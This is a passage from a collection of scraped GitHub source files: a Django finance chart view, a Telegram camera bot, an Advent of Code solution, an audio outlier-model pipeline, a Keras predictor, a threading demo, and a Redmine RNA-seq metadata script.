paydocs, initial_debts)\n loans_table = self.get_loan_tables(agents, currencies, paydocs, paydocs_before, initial_debts)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'loans_table': loans_table,\n # 'credit_portfolio': credit_portfolio,\n # 'debit_portfolio': debit_portfolio,\n # 'cf_fin_dynamics': self.get_cf_dynamics(paydocs),\n }\n\n return render(request, 'registers/charts_fin.html', context=context)\n\n # chart loans_table\n def get_loan_tables(self, agents, currencies, paydocs, paydocs_before, initial_debts, ):\n loans_table = []\n print(initial_debts)\n for agent in agents:\n agent_name = str(agent)\n initial_debts = initial_debts.filter(counterparty=agent)\n paydocs = paydocs.filter(counterparty=agent)\n paydocs_before = paydocs_before.filter(counterparty=agent)\n for currency in currencies:\n currency_name = str(currency)\n initial_debt = initial_debts.filter(currency=currency)\n debit = initial_debt.aggregate(Sum(\"debit\")).get('debit__sum', 0.00)\n if debit is None:\n debit = 0.0\n credit = initial_debt.aggregate(Sum(\"credit\")).get('credit__sum', 0.00)\n if credit is None:\n credit = 0.0\n initial_debt = debit - credit\n\n # print(f'initial - {agent.counterparty}: {initial_debt}')\n\n receipts = paydocs.filter(flow='Receipts', currency=currency)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n\n receipts_before = paydocs_before.filter(flow='Receipts', currency=currency)\n receipts_before_sum = receipts_before.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_before_sum is None:\n receipts_before_sum = 0\n\n payments = paydocs.filter(flow='Payments', currency=currency)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n payments_before = paydocs_before.filter(flow='Payments', currency=currency)\n payments_before_sum = payments_before.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_before_sum is None:\n payments_before_sum = 0\n\n start_balance = int(initial_debt) + int(receipts_before_sum) - int(payments_before_sum)\n start_debit = abs(start_balance) if start_balance > 0 else 0\n start_credit = abs(start_balance) if start_balance < 0 else 0\n\n final_balance = int(initial_debt) - int(payments_sum) + int(receipts_sum)\n final_debit = abs(final_balance) if final_balance > 0 else 0\n final_credit = abs(final_balance) if final_balance < 0 else 0\n\n loans_table.append([agent_name, int(start_debit), int(start_credit), int(receipts_sum),\n int(payments_sum), int(final_debit), int(final_credit), currency_name])\n\n print(f'table - {loans_table}')\n return loans_table\n\n # charts portfolios\n def get_loan_portfolio(self, agents, paydocs, initial_debts):\n portfolio = []\n for agent in agents:\n initial_debts = initial_debts.filter(counterparty=agent)\n print(f' the {initial_debts}')\n if initial_debts is None:\n initial_debts.credit = 0\n initial_debts.debit = 0\n # if initial_debts.debit is None:\n\n receipts = paydocs.filter(counterparty=agent)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n payments = paydocs.filter(counterparty=agent)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n open_balance = 0 # agent.credit - agent.debit\n final_balance = abs(open_balance + receipts_sum - payments_sum)\n agent = str(agent)\n\n portfolio.append([agent, int(final_balance)])\n\n return portfolio\n\n # function for getting full data\n @staticmethod\n def get_dynamics(paydocs):\n dynamics = {}\n for paydoc in paydocs:\n month = str(paydoc.date.month).rjust(2, '0')\n period = f'{str(paydoc.date.year)}/{month}'\n amount = float(paydoc.inflow_amount) if paydoc.inflow_amount != 0 else float(paydoc.outflow_amount)\n if period not in dynamics:\n dynamics[period] = amount\n else:\n dynamics[period] += amount\n\n return dynamics\n\n # get data payments and payments\n def get_total_cf(self, paydocs):\n payments_dynamics = self.get_dynamics(paydocs)\n receipts_dynamics = self.get_dynamics(paydocs)\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n return total_cf\n\n # chart 4 total cash flow\n def get_cf_dynamics(self, paydocs):\n total_cf = self.get_total_cf(paydocs)\n cf_dynamics = []\n for k, v in total_cf.items():\n cf_dynamics.append([k, *v, v[0] - v[1]])\n\n return cf_dynamics\n\n\ndef ChartsInvestView(request):\n pass\n\n\nclass ChartsFinView1(View):\n def get(self, request):\n form = DashboardFilter(request.GET)\n\n lenders = InitialDebts.objects.filter(type_debt='Lender')\n borrowers = InitialDebts.objects.filter(type_debt='Borrower')\n\n receipts = PaymentDocuments.objects.filter(flow='Receipts', item__activity='financing')\n payments = PaymentDocuments.objects.filter(flow='Payments', item__activity='financing')\n receipts_before = receipts\n payments_before = payments\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n receipts = receipts.filter(organization=form.cleaned_data['organization'])\n payments = payments.filter(organization=form.cleaned_data['organization'])\n lenders = lenders.filter(organization=form.cleaned_data['organization'])\n borrowers = borrowers.filter(organization=form.cleaned_data['organization'])\n\n if form.cleaned_data['date_start']:\n receipts = receipts.filter(date__gte=form.cleaned_data['date_start'])\n payments = payments.filter(date__gte=form.cleaned_data['date_start'])\n receipts_before = receipts_before.filter(date__lte=form.cleaned_data['date_start'])\n payments_before = payments_before.filter(date__lte=form.cleaned_data['date_start'])\n else:\n receipts_before = PaymentDocuments.objects.none()\n payments_before = PaymentDocuments.objects.none()\n if form.cleaned_data['date_end']:\n receipts = receipts.filter(date__lte=form.cleaned_data['date_end'])\n payments = payments.filter(date__lte=form.cleaned_data['date_end'])\n\n loan_portfolio = self.get_loan_portfolio(lenders, receipts, payments)\n debit_portfolio = self.get_loan_portfolio(borrowers, receipts, payments)\n lenders_table = self.get_tables(lenders, receipts, payments, receipts_before, payments_before)\n borrowers_table = self.get_tables(borrowers, receipts, payments, receipts_before, payments_before)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'loan_portfolio': loan_portfolio,\n 'debit_portfolio': debit_portfolio,\n 'cf_fin_dynamics': self.get_cf_dynamics(receipts, payments),\n 'lenders_table': lenders_table,\n 'borrowers_table': borrowers_table,\n }\n\n return render(request, 'registers/charts_fin.html', context=context)\n\n # charts 1, 2 portfolios\n\n def get_loan_portfolio(self, agents, receipts, payments):\n portfolio = []\n for agent in agents:\n if agent.credit is None:\n agent.credit = 0\n if agent.debit is None:\n agent.debit = 0\n receipts = receipts.filter(counterparty=agent.counterparty)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n payments = payments.filter(counterparty=agent.counterparty)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n open_balance = agent.credit - agent.debit\n final_balance = abs(open_balance + receipts_sum - payments_sum)\n agent = str(agent.counterparty)\n\n portfolio.append([agent, int(final_balance)])\n print(agents)\n print(portfolio)\n return portfolio\n\n # chart 4, 5: agents_table\n def get_tables(self, agents, receipts, payments, receipts_before, payments_before):\n agents_table = []\n\n for agent in agents:\n receipts = receipts.filter(counterparty=agent.counterparty)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum == None: receipts_sum = 0\n\n receipts_before = receipts_before.filter(counterparty=agent.counterparty)\n receipts_before_sum = receipts_before.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_before_sum == None: receipts_before_sum = 0\n\n payments = payments.filter(counterparty=agent.counterparty)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum == None: payments_sum = 0\n\n payments_before = payments_before.filter(counterparty=agent.counterparty)\n payments_before_sum = payments_before.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_before_sum == None: payments_before_sum = 0\n\n start_balance = agent.debit - agent.credit + receipts_before_sum - payments_before_sum\n start_debit = abs(start_balance) if start_balance > 0 else 0\n start_credit = abs(start_balance) if start_balance < 0 else 0\n\n final_balance = agent.debit - agent.credit - receipts_sum + payments_sum\n final_debit = abs(final_balance) if final_balance > 0 else 0\n final_credit = abs(final_balance) if final_balance < 0 else 0\n agent = str(agent.counterparty)\n\n agents_table.append([agent, int(start_debit), int(start_credit), int(receipts_sum),\n int(payments_sum), int(final_debit), int(final_credit)])\n\n print(agents_table)\n return agents_table\n\n # function for getting full data\n @staticmethod\n def get_dynamics(flow):\n dynamics = {}\n for i in flow:\n month = str(i.date.month).rjust(2, '0')\n period = f'{str(i.date.year)}/{month}'\n amount = float(i.inflow_amount) if i.inflow_amount != 0 else float(i.outflow_amount)\n if period not in dynamics:\n dynamics[period] = amount\n else:\n dynamics[period] += amount\n\n return dynamics\n\n # get data payments and payments\n def get_total_cf(self, payments, receipts):\n receipts_dynamics = self.get_dynamics(receipts)\n payments_dynamics = self.get_dynamics(payments)\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n return total_cf\n\n # chart 4 total cash flow\n def get_cf_dynamics(self, payments, receipts):\n total_cf = self.get_total_cf(payments, receipts)\n cf_dynamics = []\n for k, v in total_cf.items():\n cf_dynamics.append([k, *v, v[0] - v[1]])\n\n return cf_dynamics\n\n\n\n","repo_name":"Alata9/EnterpriseFinance","sub_path":"registers/views_charts.py","file_name":"views_charts.py","file_ext":"py","file_size_in_byte":28392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"45382424178","text":"# -*- coding: utf-8 -*-\n\nimport telebot # Librería de la API del bot.\nfrom telebot import types # Tipos para la API del bot.\nimport time # Librería para hacer que el programa que controla el bot no se acabe.\nimport wikipedia\nimport picamera\nfrom time import sleep\nTOKEN = 'Aquí va el tokken' # Nuestro tokken del bot (el que @BotFather nos dió).\n\nbot = telebot.TeleBot(TOKEN) # Creamos el objeto de nuestro bot.\n@bot.message_handler(commands=['hora']) # Indicamos que lo siguiente va a controlar el comando '/hora'.\ndef command_hora(m): # Definimos una función que resuelva lo que necesitemos.\n cid = m.chat.id # Guardamos el ID de la conversación para poder responder.\n bot.send_message( cid, time.strftime(\"%H:%M:%S\")) # Con la función 'send_message()' del bot, enviamos al ID almacenado el texto que queremos.\n@bot.message_handler(commands=['prueba']) # Indicamos que lo siguiente va a controlar el comando '/prueba'\ndef command_prueba(m): # Definimos una función que resuleva lo que necesitemos.\n cid = m.chat.id # Guardamos el ID de la conversación para poder responder.\n bot.send_message( cid, 'probando') # Con la función 'send_message()' del bot, enviamos al ID almacenado el texto que queremos.\n@bot.message_handler(commands=['wiki'])\ndef command_wiki(m):\n cid = m.chat.id\n msg = m.text[6:]\n if msg =='':\n bot.send_message(cid, \"Escribe algo despues de /wiki\")\n else :\n try:\n bot.send_message(cid,wikipedia.summary(msg, sentences=6))\n except wikipedia.exceptions.DisambiguationError as e:\n bot.send_message(cid, e)\n@bot.message_handler(commands=['picamera'])\ndef command_picamera(m):\n cid = m.chat.id\n msg = m.text[6:]\n try:\n with picamera.PiCamera() as camera:\n# camera.hflip = True\n# camera.vflip = True\n camera.capture(\"imagen.jpg\")\n sleep(1)\n photo = open('imagen.jpg', 'rb')\n bot.send_photo(cid, photo)\n except :\n bot.send_message(cid, \"Fallo al arrancar la camara, prueba mas tarde\")\n\nbot.polling(none_stop=True) # Con esto, le decimos al bot que siga funcionando incluso si encuentra algún fallo.\n","repo_name":"inakidml/PiCameraToTelegramBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"3012645754","text":"with open(\"input\") as file:lines = file.read().splitlines()\n\nwhen=int(lines[0])\nbuses= list(map(int,list(filter(lambda b: b!=\"x\", lines[1].split(\",\")))))\n\nwait=0\nfound=False\nwhile not(found):\n for b in buses:\n if (when%b==0):\n found=True\n break\n else:\n wait+=1\n when+=1\n\nprint(\"part 1: \",wait*b)\nprint()\n\n#part 2\n\n#copy paste from somewhere\ndef gcd(a,b):\n \"\"\"Compute the greatest common divisor of a and b\"\"\"\n while b > 0:\n a, b = b, a % b\n return a\n \ndef lcm(a, b):\n \"\"\"Compute the lowest common multiple of a and b\"\"\"\n return a * b / gcd(a, b)\n##\n\nbusesAll = lines[1].split(\",\")\n\nbig = max(buses)\nwhen=0\n\nbigIndex=busesAll.index(str(big))\n\nbusesWithIndexDiffs={}\nindexDiffFromFirstAndBig=\"\"\n\nfor i in range(len(busesAll)):\n if (busesAll[i]!=\"x\"):\n if(int(busesAll[i])!=big):\n busesWithIndexDiffs[int(busesAll[i])] = -(bigIndex-i)\n if indexDiffFromFirstAndBig==\"\":\n indexDiffFromFirstAndBig=-(bigIndex-i)\n\n#print(busesWithIndexDiffs)\n\nfound=set([big])\nincr=big\nwhile len(found)= 2:\n wfs = wfs[:, 0]\n return wfs\n\n\ndefault_mall = dict(\n # Factory Input Stores\n sound_output={k: v for k, v in upload_files_store.getter_items()},\n step_factories=dict(\n # ML\n chunker=FuncFactory(simple_chunker),\n featurizer=FuncFactory(simple_featurizer),\n ),\n # Output Store\n data=dict(),\n steps={k: v for k, v in pipeline_step_store.getter_items()},\n pipelines=dict(),\n exec_outputs=dict(),\n learned_models=dict(),\n models_scores=dict(),\n source=None,\n)\n\nmall = get_mall(defaults=default_mall)\ncrudifier = partial(Crudifier, mall=mall)\n\n\n@add_to_upload_files_store\n@crudifier(output_store='sound_output')\ndef upload_sound(train_audio: List[WaveForm], tag: str):\n return train_audio, tag\n\n\ndef get_step_name(step):\n return [k for k, v in get_mall()['steps'].items() if v == step][0]\n\n\ndef _save_name_getter(args, kwargs, function=None, return_value=None):\n return kwargs['save_name']\n\n\n@Persist.function_call(key_getter=_save_name_getter, store=pipeline_step_store)\n@crudifier(param_to_mall_map=dict(step_factory='step_factories'), output_store='steps')\ndef mk_step(step_factory: Callable, kwargs: dict):\n kwargs = clean_dict(kwargs)\n step = partial(step_factory, **kwargs)()\n\n return step\n\n\ndef get_selected_step_factory_sig():\n selected_step_factory = get_mall()['step_factories'].get(\n b.selected_step_factory.get()\n )\n if selected_step_factory:\n return Sig(selected_step_factory)\n\n\n@crudifier(output_store='pipelines',)\n@resolve_item_getter_args\ndef mk_pipeline(steps: Iterable[Callable]):\n return LineParametrized(*steps)\n\n\n@crudifier(\n param_to_mall_map=dict(tagged_data='sound_output', preprocess_pipeline='pipelines'),\n output_store='learned_models',\n)\n@UploadFilesStore.resolve_item_getter_args\ndef learn_outlier_model(tagged_data, preprocess_pipeline, n_centroids=5):\n\n sound, tag = tagged_sounds_to_single_array(*tagged_data)\n wfs = np.array(sound)\n\n wfs = assert_dims(wfs)\n\n fvs = preprocess_pipeline(wfs)\n model = Stroll(n_centroids=n_centroids)\n model.fit(X=fvs)\n\n return model\n\n\n@crudifier(\n param_to_mall_map=dict(\n tagged_data='sound_output',\n preprocess_pipeline='pipelines',\n fitted_model='learned_models',\n ),\n output_store='models_scores',\n)\n@UploadFilesStore.resolve_item_getter_args\ndef apply_fitted_model(tagged_data, preprocess_pipeline, fitted_model):\n try:\n dill_files['tagged_data'] = tagged_data\n except Exception as e:\n print('tagged_data', e)\n try:\n dill_files['preprocess_pipeline'] = preprocess_pipeline\n except Exception as e:\n print('preprocess_pipeline', e)\n try:\n dill_files['fitted_model'] = fitted_model\n except Exception as e:\n print('fitted_model', e)\n sound, tag = tagged_sounds_to_single_array(*tagged_data)\n wfs = np.array(sound)\n wfs = assert_dims(wfs)\n\n fvs = preprocess_pipeline(wfs)\n scores = fitted_model.score_samples(X=fvs)\n return scores\n\n\n@crudifier(param_to_mall_map=dict(pipeline='pipelines'),)\ndef visualize_pipeline(pipeline: LineParametrized):\n\n return pipeline\n\n\n@crudifier(param_to_mall_map=dict(scores='models_scores'),)\ndef visualize_scores(scores, threshold=80, num_segs=3):\n\n intervals = scores_to_intervals(scores, threshold, num_segs)\n\n return scores, intervals\n\n\n@crudifier(\n param_to_mall_map=dict(\n preprocess_pipeline='pipelines', fitted_model='learned_models',\n ),\n output_store='source',\n)\ndef live_apply_fitted_model(\n preprocess_pipeline,\n fitted_model,\n input_device=None,\n rate=44100,\n width=2,\n channels=1,\n frames_per_buffer=44100,\n seconds_to_keep_in_stream_buffer=60,\n graph_types='volume',\n):\n stop_stream()\n audio_store_rootdir = Path.cwd() / 'audio_store'\n audio_store_rootdir.mkdir(parents=True, exist_ok=True)\n audio_store = WavFileStore(rootdir=str(audio_store_rootdir))\n\n source = mk_live_graph_data_buffer(\n input_device,\n rate,\n width,\n channels,\n frames_per_buffer,\n seconds_to_keep_in_stream_buffer,\n graph_types,\n audio_store=audio_store,\n **si_apply_fitted_model(preprocess_pipeline, fitted_model),\n )\n source.start()\n return source\n","repo_name":"otosense/plunk","sub_path":"plunk/ap/app4_drill_but_make_it_slabsiter/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":5999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"16735667301","text":"import numpy as np\nfrom data import get_in_out_simple_predictive_NN\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import Sequential, layers\nimport matplotlib.pyplot as plt\n\n# Parameters\nlearning_rate = 1.59e-7\nmomentum = 0.95\nnb_epochs = 10\nbatch_size = 128\ntest_ratio = 0.3\nnb_neurone_layer_1 = 256\nnb_neurone_layer_2 = 256\nnb_neurone_layer_3 = 64\n\n\ndef generate_predictive_NN():\n \"\"\"\n Generate the predictive NN which predict the next angles of the arm based on the current ones\n\n :return: None\n \"\"\"\n # Load data\n inputs, outputs = get_in_out_simple_predictive_NN()\n n, p = inputs.shape\n nb_inputs = 12 # 17\n nb_outputs = 5\n\n X_train, X_test, y_train, y_test = train_test_split(inputs, outputs, test_size=test_ratio)\n\n mod = Sequential()\n mod.add(layers.Dense(nb_neurone_layer_1, activation='relu', input_shape=(nb_inputs,)))\n mod.add(layers.Dense(nb_neurone_layer_2, activation='relu'))\n mod.add(layers.Dropout(0.5))\n mod.add(layers.Dense(nb_neurone_layer_3, activation='relu'))\n mod.add(layers.Dense(nb_outputs, activation='linear'))\n mod.compile(loss='mse')\n print(\"Model created !\")\n\n print(\"Training of the model ...\")\n hist = mod.fit(X_train, y_train, batch_size=batch_size, epochs=nb_epochs, validation_data=(X_test, y_test))\n print(\"Model trained !\")\n mod.save('models/predictive_NN')\n print(\"Model saved !\")\n\n loss_values = hist.history['loss']\n val_loss_values = hist.history['val_loss']\n epochs = range(1, len(loss_values) + 1)\n\n plt.plot(epochs, loss_values, label='Training Loss')\n plt.plot(epochs, val_loss_values, label='Validation Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend()\n\n plt.show()\n","repo_name":"MarcDcls/AI_Prosthesis","sub_path":"predictive_NN.py","file_name":"predictive_NN.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25244091624","text":"'使用threading 模块创建线程,直接从threading.Thread继承'\n\nimport threading\nimport time\n\n\nexitFlag = 0\n\n\ndef print_time(threadName, delay, counter):\n while counter:\n if exitFlag:\n threading.Thread.exit()\n time.sleep(delay)\n print('{0}: {1}'.format(threadName, time.ctime(time.time())))\n counter -= 1\n\n\nclass MyThread(threading.Thread):\n '''\n 继承threaing.Thread类,重写__init__()和run()方法\n '''\n\n def __init__(self, threadID, name, counter):\n '''\n 重写__init__()\n :param threadID:\n :param name: 线程名字\n :param counter:\n '''\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self):\n '''\n 将要执行的代码写入run()函数里,线程在创建后会直接运行run()函数\n :return:\n '''\n print('starting ', self.name)\n print_time(self.name, self.counter, 5)\n print('Exiting ', self.name)\n\n\n\ndef main():\n # 创建线程\n thread1 = MyThread(1, 'Thread-1', 1)\n thread2 = MyThread(2, 'Thread-2', 2)\n\n # 启动线程\n thread1.start()\n thread2.start()\n\n print('Exiting Main Thread')\n\nif __name__ == '__main__':\n main()","repo_name":"haalo/learning-Python3","sub_path":"day01/threadings_test/threading_01.py","file_name":"threading_01.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10442111016","text":"from typing import Dict, List, Tuple\nimport argparse\nimport json\nimport re\nfrom unidecode import unidecode\nfrom pathlib import Path\nfrom redminelib import Redmine\nfrom redminelib.resources import Issue as RedmineIssue\nfrom redminelib.managers import ResourceManager as RedmineResource\n\nurl = 'https://redmine.apidb.org'\ndefault_fields = dict(\n status_name='Data Processing (EBI)',\n cf_17=\"Data Processing (EBI)\",\n)\ninsdc_pattern = r'^GC[AF]_\\d{9}(\\.\\d+)?$'\naccession_api_url = \"https://www.ebi.ac.uk/ena/browser/api/xml/%s\"\nveupathdb_id = 1976\n\n\ndef load_abbrevs(path: str) -> List[str]:\n \"\"\"\n Load a list of organism abbrevs from a file. Expected to be one per line.\n\n Args:\n path: Path to the organism abbrevs file.\n\n Returns:\n A list of all organism_abbrevs.\n\n \"\"\"\n if not path:\n print(\"Warning: I don't have a list of older abbrevs to compare with.\")\n return []\n abbrevs = []\n with open(path, \"r\") as abbr_file:\n for line in abbr_file:\n line = line.rstrip()\n if line:\n fields = line.split(\"\\t\")\n if len(fields) == 1:\n abbrevs.append(line)\n else:\n raise Exception(\n \"Can't load current abbrevs from a multicolumn string\")\n return abbrevs\n\n\ndef retrieve_rnaseq_datasets(redmine: Redmine, output_dir_path: str, build: int = None,\n abbrevs_file: str = None) -> None:\n \"\"\"\n Get RNA-Seq metadata from Redmine, store them in json files.\n Each issue/dataset is stored as one file in the output dir.\n\n Args:\n redmine: A connected Redmine object.\n output_dir_path: Directory where the dataset files are to be stored.\n build: BRC build number.\n abbrevs_file: Path to a list of organism_abbrevs that are already in use.\n \"\"\"\n\n all_abbrevs = load_abbrevs(abbrevs_file)\n\n issues = get_issues(redmine, \"RNA-seq\", build)\n if not issues:\n print(\"No files to create\")\n return\n \n # Create the output dir\n output_dir = Path(output_dir_path)\n output_dir.mkdir(exist_ok=True)\n \n # Write all datasets in files\n all_datasets = []\n used_names = []\n\n problems = []\n ok_datasets = []\n warn_abbrevs = []\n \n for issue in issues:\n dataset, problem = parse_dataset(issue)\n \n if problem:\n problems.append({\"issue\": issue, \"desc\": problem})\n continue\n\n try:\n component = dataset[\"component\"]\n organism = dataset[\"species\"]\n dataset_name = dataset[\"name\"]\n \n if dataset_name in used_names:\n problems.append(\n {\"issue\": issue, \"desc\": f\"Dataset name already used: {dataset_name}\"}\n )\n continue\n else:\n used_names.append(dataset_name)\n \n if abbrevs_file and organism not in all_abbrevs:\n warn_abbrevs.append({\"issue\": issue, \"desc\": organism})\n \n ok_datasets.append({\"issue\": issue, \"desc\": organism})\n \n # Create directory\n dataset_dir = output_dir / component\n dataset_dir.mkdir(exist_ok=True)\n \n # Create file\n file_name = organism + \"_\" + dataset_name + \".json\"\n dataset_file = dataset_dir / file_name\n with open(dataset_file, \"w\") as f:\n json.dump([dataset], f, indent=True)\n except Exception as error:\n problems.append({\"issue\": issue, \"desc\": str(error)})\n pass\n all_datasets.append(dataset)\n\n print(\"%d issues total\" % len(issues))\n print_summaries(problems, \"issues with problems\")\n print_summaries(\n warn_abbrevs,\n \"issues using unknown organism_abbrevs (maybe new ones). Those are still imported\"\n )\n print_summaries(ok_datasets, \"datasets imported correctly\")\n\n # Create a single merged file as well\n merged_file = Path(output_dir) / \"all.json\"\n with open(merged_file, \"w\") as f:\n json.dump(all_datasets, f, indent=True)\n\n \ndef print_summaries(summaries: Dict, description: str) -> None:\n \"\"\"Print a summary of various counts.\n\n This will print one line for each issue in the dict, with its description, the issue id\n and the issue subject.\n\n Args:\n summaries: Dict with 2 keys:\n issue: A Redmine Issue object.\n desc: A description for that issue.\n \"\"\"\n desc_length = 64\n \n if summaries:\n print()\n print(f\"{len(summaries)} {description}:\")\n for summary in summaries:\n desc = summary[\"desc\"]\n issue = summary[\"issue\"]\n print(f\"\\t{desc:{desc_length}}\\t{issue.id}\\t({issue.subject})\")\n \n \ndef parse_dataset(issue: RedmineIssue) -> Tuple[Dict, str]:\n \"\"\"\n Extract RNA-Seq dataset metadata from a Redmine issue.\n\n Args:\n issue: A Redmine issue.\n\n Returns:\n A tuple of 2 objects:\n datasets: A dict representing a dataset, with the following keys:\n component: String for the BRC component DB.\n species: String for the organism abbrev.\n name: String for the internal dataset name.\n problem: A string description if there was a parsing problem\n (empty string otherwise).\n \"\"\"\n customs = get_custom_fields(issue)\n dataset = {\n \"component\": \"\",\n \"species\": \"\",\n \"name\": \"\",\n \"runs\": [],\n }\n problem = \"\"\n\n dataset[\"component\"] = get_custom_value(customs, \"Component DB\")\n dataset[\"species\"] = get_custom_value(customs, \"Organism Abbreviation\").strip()\n dataset[\"name\"] = get_custom_value(customs, \"Internal dataset name\").strip()\n\n if not dataset[\"species\"]:\n problem = \"Missing Organism Abbreviation\"\n elif not check_organism_abbrev(dataset[\"species\"]):\n problem = f\"Wrong Organism Abbreviation format: '{dataset['species']}'\"\n elif not dataset[\"name\"]:\n problem = \"Missing Internal dataset name\"\n else:\n dataset[\"name\"] = normalize_name(dataset[\"name\"])\n \n # Get samples/runs\n samples_str = get_custom_value(customs, \"Sample Names\")\n try:\n samples = parse_samples(samples_str)\n \n if not samples:\n problem = \"Missing Samples\"\n \n dataset[\"runs\"] = samples\n except Exception as e:\n problem = str(e)\n \n return dataset, problem\n\n\ndef check_organism_abbrev(name: str) -> bool:\n \"\"\"Check the organism_abbrevs string format to avoid special characters.\n\n Args:\n name: organism_abbrev to check.\n \n Returns:\n True if the organism_abbrev format is correct.\n False otherwise.\n \"\"\"\n return not re.search(r'[ \\/\\(\\)#\\[\\]:]', name)\n\n\ndef normalize_name(old_name: str) -> str:\n \"\"\"Remove special characters from an organism_abbrev, keep ascii only.\n\n Args:\n old_name: the organism_abbrev to format.\n \n Returns:\n The formatted organism_abbrev.\n \"\"\"\n \n # Remove any diacritics\n name = old_name.strip()\n name = unidecode(name)\n name = re.sub(r\"[ /]\", \"_\", name)\n name = re.sub(r\"[;:.,()\\[\\]{}]\", \"\", name)\n name = re.sub(r\"\\+\", \"_plus_\", name)\n name = re.sub(r\"\\*\", \"_star_\", name)\n name = re.sub(r\"%\", \"pc_\", name)\n name = re.sub(r\"_+\", \"_\", name)\n if re.search(r\"[^A-Za-z0-9_.-]\", name):\n print(\"WARNING: name contains special characters: %s (%s)\" % (old_name, name))\n return\n \n return name\n\n\ndef parse_samples(sample_str: str) -> List[Dict]:\n \"\"\"Parse a list of samples from a Redmine task.\n\n Args:\n sample_str: The value of the field 'Sample Names' from an RNA-Seq Redmine task.\n \n Returns:\n A list of samples dicts, with the following keys:\n name: the name of the sample.\n accessions: a list of string representing the SRA accessions for that sample.\n \"\"\"\n samples = []\n \n # Parse each line\n lines = sample_str.split(\"\\n\")\n\n sample_names = dict()\n for line in lines:\n line = line.strip()\n if line == \"\":\n continue\n\n # Get sample_name -> accessions\n parts = line.split(\":\")\n if len(parts) > 2:\n end = parts[-1]\n start = \":\".join(parts[:-1])\n parts = [start, end]\n \n if len(parts) == 2:\n sample_name = parts[0].strip()\n \n if sample_name in sample_names:\n raise Exception(\"Several samples have the same name '%s'\" % sample_name)\n else:\n sample_names[sample_name] = True\n \n accessions_str = parts[1].strip()\n accessions = [x.strip() for x in accessions_str.split(\",\")]\n \n if not validate_accessions(accessions):\n if validate_accessions(sample_name.split(\",\")):\n raise Exception(\"Sample name and accessions are switched?\")\n else:\n raise Exception(f\"Invalid accession among '{accessions}'\")\n \n sample = {\n \"name\": normalize_name(sample_name),\n \"accessions\": accessions\n }\n samples.append(sample)\n else:\n raise Exception(\"Sample line doesn't have 2 parts: '%s'\" % line)\n \n return samples\n\n\ndef validate_accessions(accessions: str) -> bool:\n \"\"\"Check SRA accessions format, to make sure we get proper ones.\n\n Args:\n accessions: a list of strings to check\n\n Return:\n True if all strings are proper SRA accessions.\n False if at least one is not a proper SRA accession.\n \"\"\"\n if \"\" in accessions:\n return False\n for acc in accessions:\n if not re.search(r'^[SE]R[RSXP]\\d+$', acc):\n return False\n return True\n\n\ndef get_custom_fields(issue: RedmineIssue) -> Dict:\n \"\"\"Put all Redmine custom fields in a dict instead of an array.\n\n Args:\n issue: A Redmine issue.\n \n Returns:\n A dict where each key is a custom field.\n \"\"\"\n \n cfs = {}\n for c in issue.custom_fields:\n cfs[c[\"name\"]] = c\n return cfs\n\n\ndef get_custom_value(customs: Dict, key: str) -> str:\n \"\"\"Retrieve a custom value from a customs dict.\n\n Args:\n customs: Dict of customs values gotten from get_custom_fields.\n key: Key to extract the value from the custom dict.\n \n Returns:\n A single value.\n Throws an exception if there are more than 1 value.\n If there is no such key in the dict, return an empty string.\n \"\"\"\n \n try:\n value = customs[key][\"value\"]\n if isinstance(value, list):\n if len(value) == 1:\n value = value[0]\n elif len(value) > 1:\n raise Exception(\"More than 1 values for key %s\" % (key))\n return value\n except KeyError:\n print(\"No field %s\" % (key))\n return \"\"\n \n\ndef get_issues(redmine: Redmine, datatype: str, build: int = None) -> List[RedmineIssue]:\n \"\"\"Retrieve all issue for new genomes, be they with or without gene sets.\n\n Args:\n redmine: A Redmine 